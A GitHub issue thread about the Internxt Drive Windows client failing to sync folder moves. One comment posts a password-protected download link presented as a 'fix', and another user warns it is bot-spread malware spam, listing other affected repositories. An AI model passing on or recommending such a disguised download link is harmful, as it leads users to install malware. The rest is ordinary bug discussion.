### ISSUE TITLE
Moving folders in Drive online is not synced properly to Windows Explorer

### ISSUE THREAD

**Issue by claell** [internxt/drive-desktop#511]
Internxt Windows client 2.1.1, newly set up (InternxtDrive folder renamed, internxt-drive AppData folder renamed).

When I now move a folder to another position on Internxt Drive WebApp, that operation is not synced to the Internxt Drive Windows client.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by claell** [comment]
Mh, after some time, it moved (while I already moved the folder back to the original location in Internxt Drive WebApp). Now, the folder is in the old location on Web, and in the new location in Windows Explorer.

Before, also hitting the manual sync button was not successful.

**Comment by VanDavv** [comment]
Please do not click on a link above! This is a scam and some kind of bot!

Infected my issue:

https://github.com/evershopcommerce/evershop/issues/605

and is infecting other repos as well! 

https://github.com/walt-id/waltid-identity/issues/722
https://github.com/csgroup-oss/sharinghub-server/issues/11
https://github.com/samie/Idle/issues/11
https://github.com/AZPixel-Team/Java2Bedrock/issues/4617
https://github.com/cnk3x/xunlei/issues/184
https://github.com/idaholab/moose/issues/28493
https://github.com/internxt/drive-desktop/issues/511
https://github.com/BusKill/usb-a-magnetic-breakaway/issues/11
https://github.com/jOOQ/jOOQ/issues/17148
https://github.com/meilisearch/meilisearch/issues/4902
https://github.com/conda/conda/issues/14197
https://github.com/kubernetes-client/java/issues/3668
https://github.com/AdguardTeam/AdguardFilters/issues/187484

**Comment by claell** [comment]
Seems to have been solved with the latest release 2.1.2. Thanks @ArceDanielShok.
